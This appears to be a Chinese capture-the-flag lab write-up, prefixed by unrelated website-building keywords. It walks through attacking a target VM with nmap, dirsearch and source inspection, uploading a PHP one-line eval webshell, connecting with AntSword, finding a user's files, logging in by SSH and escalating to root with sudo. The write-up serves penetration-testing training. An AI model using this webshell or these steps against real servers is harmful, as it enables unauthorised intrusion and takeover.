2026/1/13 6:24:18
网站建设
项目流程
国外网站建设官网,新八建设集团网站,网上营销的方式,哪个网站有老外教做蛋糕实验目的#xff1a;掌握nmap、dirb等工具的使用#xff0c;掌握单主机渗透常规思路。软件工具#xff1a;Nmap#xff0c;dirb #xff0c;AntSword实验目标#xff1a;获得flag实验步骤#xff1a;信息收集在kali中打开终端#xff0c;使用nmap工具对目标机器进行扫描…实验目的掌握nmap、dirb等工具的使用掌握单主机渗透常规思路。软件工具Nmapdirb AntSword实验目标获得flag实验步骤信息收集在kali中打开终端使用nmap工具对目标机器进行扫描发现目标开启了http服务也就是80端口在浏览器上输入靶机ip看看发现是个登录界面尝试一下sql注入发现好像不行也没有发现什么信息接着使用dirsearch工具进行路径的扫描-i返回200状态码的扫描出了不少的路径看到了网络爬虫协议下面列出来禁止爬取的路径那就不告诉我们存在这些路径在/flag路径下拿到第一个flag接着查找一下别的路径在路径下有个管理员路径显示无法使用但是返回的状态码是200ctrlu查看一下源代码果然藏了东西获得第二个flag并且还有一个账号和密码想到刚刚的登录界面尝试登录一下首页这是一个文件上传的页面上传带有一句话木马的php?php eval($_POST[hack])? 然后修改后缀为php的文件发现竟然可以成功上传在之前的路径扫描中知道路径下有个uploaded_files/的路径尝试一下成功上传并且执行了phpinfo命令接着使用蚁剑进行连接,密码是刚刚一句话木马里面的hack在hint.txt中成功拿到第三个flag上传有个提示告诉我们存在一个用户technawi并且有个flag.txt文件需要这个权限接着我们打开蚁剑的终端窗口定位technawi用户文件find / -user ‘technawi’ 2/dev/null(这个命令的核心是在整个文件系统中查找所有属于用户 technawi 的文件 / 目录同时屏蔽执行过程中产生的 “权限不足” 等错误提示只输出有效结果。)-userfind 命令的内置参数专门用于匹配 “文件属主”2/dev/null2标准错误输出 重定向 /dev/null 空设备相当于被丢弃发现有个txt文件比较奇怪查询试试成功拿到第四个flag里面竟然存放了technawi的账号和密码接着回到虚拟机登录一下这个用户的账号和密码使用远程连接ssh靶机的ip然后查看flag.txt文件成功拿到第5个flagSudo提权前面我们在home目录下发现 .sudo_as_admin_successful 文件表示需要使用sudo提权。输入sudo -l 查看用户technawi的sudo权限配置显示“ALL”说明technawi可以用自己的密码切换为 root 用户简单来说就是即可以通过 sudo 获取 root 权限直接输入sudo su成功提权成为root用户